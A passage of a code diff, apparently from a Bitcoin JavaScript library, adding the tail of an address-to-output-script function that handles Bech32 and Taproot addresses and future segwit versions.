+      return payments.p2sh({ hash: decodeBase58.hash }).output;
+  } else {
+    try {
+      decodeBech32 = fromBech32(address);
+    } catch (e) {}
+    if (decodeBech32) {
+      if (decodeBech32.prefix !== network.bech32)
+        throw new Error(address + ' has an invalid prefix');
+      if (decodeBech32.version === 0) {
+        if (decodeBech32.data.length === 20)
+          return payments.p2wpkh({ hash: decodeBech32.data }).output;
+        if (decodeBech32.data.length === 32)
+          return payments.p2wsh({ hash: decodeBech32.data }).output;
+      } else if (decodeBech32.version === 1) {
+        if (decodeBech32.data.length === 32)
+          return payments.p2tr({ pubkey: decodeBech32.data }).output;
+      } else if (
+        decodeBech32.version >= FUTURE_SEGWIT_MIN_VERSION &&
+        decodeBech32.version <= FUTURE_SEGWIT_MAX_VERSION &&
+        decodeBech32.data.length >= FUTURE_SEGWIT_MIN_SIZE &&
+        decodeBech32.data.length <= FUTURE_SEGWIT_MAX_SIZE
+      ) {
+        if (WARNING_STATES[1] === false) {
+          console.warn(FUTURE_SEGWIT_VERSION_WARNING);
+          WARNING_STATES[1] = true;
+        }
+        return bscript.compile([
+          decodeBech32.version + FUTURE_SEGWIT_VERSION_DIFF,
+          decodeBech32.data,
+        ]);
+      }
+    }
+  }
+  throw new Error(address + ' has no matching Script');
+}